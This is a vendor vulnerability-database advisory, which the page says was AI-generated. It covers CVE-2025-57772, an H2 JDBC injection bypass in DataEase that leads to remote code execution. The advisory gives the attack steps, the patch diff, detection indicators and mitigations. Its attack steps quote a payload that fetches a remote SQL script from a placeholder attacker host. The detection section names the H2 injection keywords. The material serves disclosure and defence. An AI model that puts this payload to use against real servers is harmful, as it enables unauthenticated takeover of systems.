The SentinelOne Annual Threat Report - A Defenders Guide from the FrontlinesThe SentinelOne Annual Threat ReportGet the Report
Experiencing a Breach?Blog
Get StartedContact Us
SentinelOne
  • Platform
    Platform Overview
    • Singularity Platform
      Welcome to Integrated Enterprise Security
    • AI for Security
      Leading the Way in AI-Powered Security Solutions
    • Securing AI
      Accelerate AI Adoption with Secure AI Tools, Apps, and Agents.
    • How It Works
      The Singularity XDR Difference
    • Singularity Marketplace
      One-Click Integrations to Unlock the Power of XDR
    • Pricing & Packaging
      Comparisons and Guidance at a Glance
    Data & AI
    • Purple AI
      Accelerate SecOps with Generative AI
    • Singularity Hyperautomation
      Easily Automate Security Processes
    • AI-SIEM
      The AI SIEM for the Autonomous SOC
    • Singularity Data Lake
      AI-Powered, Unified Data Lake
    • Singularity Data Lake for Log Analytics
      Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
    Endpoint Security
    • Singularity Endpoint
      Autonomous Prevention, Detection, and Response
    • Singularity XDR
      Native & Open Protection, Detection, and Response
    • Singularity RemoteOps Forensics
      Orchestrate Forensics at Scale
    • Singularity Threat Intelligence
      Comprehensive Adversary Intelligence
    • Singularity Vulnerability Management
      Application & OS Vulnerability Management
    • Singularity Identity
      Identity Threat Detection and Response
    Cloud Security
    • Singularity Cloud Security
      Block Attacks with an AI-Powered CNAPP
    • Singularity Cloud Native Security
      Secure Cloud and Development Resources
    • Singularity Cloud Workload Security
      Real-Time Cloud Workload Protection Platform
    • Singularity Cloud Data Security
      AI-Powered Threat Detection for Cloud Storage
    • Singularity Cloud Security Posture Management
      Detect and Remediate Cloud Misconfigurations
    Securing AI
    • Prompt Security
      Secure AI Tools Across Your Enterprise
  • Why SentinelOne?
    Why SentinelOne?
    • Why SentinelOne?
      Cybersecurity Built for What’s Next
    • Our Customers
      Trusted by the World’s Leading Enterprises
    • Industry Recognition
      Tested and Proven by the Experts
    • About Us
      The Industry Leader in Autonomous Cybersecurity
    Compare SentinelOne
    • Arctic Wolf
    • Broadcom
    • CrowdStrike
    • Cybereason
    • Microsoft
    • Palo Alto Networks
    • Sophos
    • Splunk
    • Trellix
    • Trend Micro
    • Wiz
    Verticals
    • Energy
    • Federal Government
    • Finance
    • Healthcare
    • Higher Education
    • K-12 Education
    • Manufacturing
    • Retail
    • State and Local Government
  • Services
    Managed Services
    • Managed Services Overview
      Wayfinder Threat Detection & Response
    • Threat Hunting
      World-Class Expertise and Threat Intelligence
    • Managed Detection & Response
      24/7/365 Expert MDR Across Your Entire Environment
    • Incident Readiness & Response
      DFIR, Breach Readiness, & Compromise Assessments
    Support, Deployment, & Health
    • Technical Account Management
      Customer Success with Personalized Service
    • SentinelOne GO
      Guided Onboarding & Deployment Advisory
    • SentinelOne University
      Live and On-Demand Training
    • Services Overview
      Comprehensive Solutions for Seamless Security Operations
    • SentinelOne Community
      Community Login
  • Partners
    Our Network
    • MSSP Partners
      Succeed Faster with SentinelOne
    • Singularity Marketplace
      Extend the Power of S1 Technology
    • Cyber Risk Partners
      Enlist Pro Response and Advisory Teams
    • Technology Alliances
      Integrated, Enterprise-Scale Solutions
    • SentinelOne for AWS
      Hosted in AWS Regions Around the World
    • Channel Partners
      Deliver the Right Solutions, Together
    • SentinelOne for Google Cloud
      Unified, Autonomous Security Giving Defenders the Advantage at Global Scale
    • Partner Locator
      Your Go-to Source for Our Top Partners in Your Region
    Partner Portal→
  • Resources
    Resource Center
    • Case Studies
    • Data Sheets
    • eBooks
    • Reports
    • Videos
    • Webinars
    • Whitepapers
    • Events
    View All Resources→
    Blog
    • Feature Spotlight
    • For CISO/CIO
    • From the Front Lines
    • Identity
    • Cloud
    • macOS
    • SentinelOne Blog
    Blog→
    Tech Resources
    • SentinelLABS
    • Ransomware Anthology
    • Cybersecurity 101
  • About
    About SentinelOne
    • About SentinelOne
      The Industry Leader in Cybersecurity
    • Investor Relations
      Financial Information & Events
    • SentinelLABS
      Threat Research for the Modern Threat Hunter
    • Careers
      The Latest Job Opportunities
    • Press & News
      Company Announcements
    • Cybersecurity Blog
      The Latest Cybersecurity Threats, News, & More
    • FAQ
      Get Answers to Our Most Frequently Asked Questions
    • DataSet
      The Live Data Platform
    • S Foundation
      Securing a Safer Future for All
    • S Ventures
      Investing in the Next Generation of Security, Data and AI
  • Pricing
Get StartedContact Us
CVE Vulnerability Database
Vulnerability Database/CVE-2025-57772

CVE-2025-57772: DataEase H2 JDBC RCE Vulnerability

CVE-2025-57772 is a H2 JDBC remote code execution bypass in DataEase that exploits the getJdbcUrl method to bypass filtering logic. This article covers the technical details, affected versions, impact, and mitigation.

Published: March 11, 2026

CVE-2025-57772 Overview

CVE-2025-57772 is a Code Injection vulnerability affecting DataEase, an open source business intelligence and data visualization tool. Prior to version 2.10.12, a security bypass exists in DataEase's H2 JDBC handling that allows attackers to circumvent filtering logic and achieve Remote Code Execution (RCE). The vulnerability stems from improper validation in the getJdbcUrl method, which returns JDBC URL parameters without adequate security checks, enabling attackers to specify the H2 driver (org.h2.Driver) for malicious JDBC connections.

Critical Impact

This vulnerability enables unauthenticated remote code execution through H2 JDBC injection, potentially allowing complete system compromise of DataEase installations exposed to the network.

Affected Products

  • DataEase versions prior to 2.10.12
  • DataEase business intelligence deployments using H2 JDBC connections
  • Self-hosted DataEase installations with network-accessible datasource configurations

Discovery Timeline

  • 2025-08-25 - CVE-2025-57772 published to NVD
  • 2025-09-03 - Last updated in NVD database

Technical Details for CVE-2025-57772

Vulnerability Analysis

This vulnerability is classified under CWE-94 (Improper Control of Generation of Code - Code Injection). The flaw exists in DataEase's datasource configuration handling, specifically in how JDBC URLs are processed and validated. When a JDBC URL meets certain criteria, the getJdbcUrl method returns the user-supplied URL directly without proper sanitization. This design flaw allows attackers to bypass H2's built-in filtering mechanisms.

The H2 database driver supports special JDBC URL parameters that can trigger code execution, such as INIT scripts or RUNSCRIPT commands. By exploiting this bypass, an attacker can craft a malicious JDBC connection string that executes arbitrary code on the underlying server when the datasource connection is established.

Root Cause

The root cause lies in the getJdbcUrl method acting as a simple getter that returns user-controlled JDBC URL parameters without validating that the URL matches the expected database type. The method fails to enforce that JDBC URLs beginning with specific prefixes (such as jdbc:db2) actually correspond to their declared driver types, allowing an attacker to supply an H2 JDBC URL while claiming to use a different driver.

Attack Vector

The attack is network-based and can be executed without authentication. An attacker exploits this vulnerability by:

  1. Submitting a datasource configuration request to the DataEase application
  2. Specifying "driver":"org.h2.Driver" in the request payload
  3. Providing a malicious H2 JDBC URL containing RCE payloads (e.g., INIT=RUNSCRIPT FROM 'http://attacker.com/malicious.sql')
  4. The getJdbcUrl method returns the malicious URL, bypassing H2's filtering logic
  5. When the connection is established, arbitrary code executes on the server
java
// Security patch in Db2.java - Validates JDBC URL prefix
// Source: https://github.com/dataease/dataease/commit/1644d81dff46272b09570fa1f4a8f83f01f37440
                     DEException.throwException("Illegal parameter: " + illegalParameter);
                 }
             }
+            if (!getJdbcUrl().startsWith("jdbc:db2")) {
+                DEException.throwException("Illegal jdbcUrl: " + getJdbcUrl());
+            }
             return getJdbcUrl();
         }
         if (StringUtils.isEmpty(extraParams.trim())) {

The patch adds validation to ensure the JDBC URL prefix matches the expected database type, preventing attackers from injecting H2 URLs through other datasource type configurations.

Detection Methods for CVE-2025-57772

Indicators of Compromise

  • Datasource configuration requests containing org.h2.Driver driver specifications with non-H2 database type declarations
  • JDBC URLs containing suspicious parameters such as INIT, RUNSCRIPT, TRACE_LEVEL_SYSTEM_OUT, or MODE=MSSQLServer
  • Unexpected outbound connections from the DataEase server to external hosts referenced in JDBC URLs
  • Process spawning or file system modifications originating from the H2 database engine or DataEase Java process

Detection Strategies

  • Monitor HTTP POST requests to datasource configuration endpoints for mismatched driver and URL prefix combinations
  • Implement Web Application Firewall (WAF) rules to detect H2-specific JDBC injection patterns in request bodies
  • Review application logs for DEException errors related to illegal JDBC URLs or parameters, indicating attempted exploitation
  • Deploy runtime application self-protection (RASP) to detect JDBC-based code injection attempts

Monitoring Recommendations

  • Enable verbose logging for datasource configuration operations in DataEase
  • Set up alerts for any datasource creation or modification requests containing H2 driver references
  • Monitor network traffic for connections to the H2 database engine ports from unexpected sources
  • Implement file integrity monitoring on the DataEase installation directory to detect post-exploitation modifications

How to Mitigate CVE-2025-57772

Immediate Actions Required

  • Upgrade DataEase to version 2.10.12 or later immediately
  • Review existing datasource configurations for any suspicious JDBC URLs or driver specifications
  • Restrict network access to DataEase instances using firewall rules until patching is complete
  • Audit logs for evidence of exploitation attempts prior to patching

Patch Information

The vulnerability has been fixed in DataEase version 2.10.12. The security patch introduces validation checks that verify JDBC URL prefixes match their declared database types, preventing the bypass of H2 filtering logic. The fix is available in commit 1644d81dff46272b09570fa1f4a8f83f01f37440. Additional details can be found in the GitHub Security Advisory GHSA-v37q-vh67-9rqv.

Workarounds

  • If immediate patching is not possible, restrict access to datasource configuration endpoints to trusted administrators only
  • Implement network segmentation to isolate DataEase servers from untrusted networks
  • Deploy a reverse proxy with request inspection to block JDBC URL patterns containing H2-specific injection payloads
  • Disable or remove unused datasource type configurations to reduce the attack surface
bash
# Example: Restrict access to DataEase using iptables
# Allow only trusted management IPs to access the DataEase port
iptables -A INPUT -p tcp --dport 8100 -s 192.168.1.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 8100 -j DROP

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

  • Vulnerability Details
  • TypeRCE

  • Vendor/TechDataease

  • SeverityHIGH

  • CVSS Score8.2

  • EPSS Probability0.18%

  • Known ExploitedNo
  • CVSS Vector
  • CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
  • Impact Assessment
  • ConfidentialityLow
  • IntegrityNone
  • AvailabilityNone
  • CWE References
  • CWE-94
  • Technical References
  • GitHub Security Advisory
  • Vendor Resources
  • GitHub Commit Details
  • Related CVEs
  • CVE-2026-32140: Dataease JDBC Driver RCE Vulnerability

  • CVE-2025-58748: Dataease JDBC URL Validation RCE Flaw

  • CVE-2025-57773: Dataease JNDI Injection RCE Vulnerability

  • CVE-2025-49003: DataEase RCE Vulnerability
Experience the World’s Most Advanced Cybersecurity Platform

Experience the World’s Most Advanced Cybersecurity Platform

See how our intelligent, autonomous cybersecurity platform can protect your organization now and into the future.

Try SentinelOne
  • Get Started
  • Get a Demo
  • Product Tour
  • Why SentinelOne
  • Pricing & Packaging
  • FAQ
  • Contact
  • Contact Us
  • Customer Support
  • SentinelOne Status
  • Language
  • Platform
  • Singularity Platform
  • Singularity Endpoint
  • Singularity Cloud
  • Singularity AI-SIEM
  • Singularity Identity
  • Singularity Marketplace
  • Purple AI
  • Services
  • Wayfinder TDR
  • SentinelOne GO
  • Technical Account Management
  • Support Services
  • Verticals
  • Energy
  • Federal Government
  • Finance
  • Healthcare
  • Higher Education
  • K-12 Education
  • Manufacturing
  • Retail
  • State and Local Government
  • Cybersecurity for SMB
  • Resources
  • Blog
  • Labs
  • Case Studies
  • Videos
  • Product Tours
  • Events
  • Cybersecurity 101
  • eBooks
  • Webinars
  • Whitepapers
  • Press
  • News
  • Ransomware Anthology
  • Company
  • About Us
  • Our Customers
  • Careers
  • Partners
  • Legal & Compliance
  • Security & Compliance
  • Investor Relations
  • S Foundation
  • S Ventures

©2026 SentinelOne, All Rights Reserved.

Privacy Notice Terms of Use

English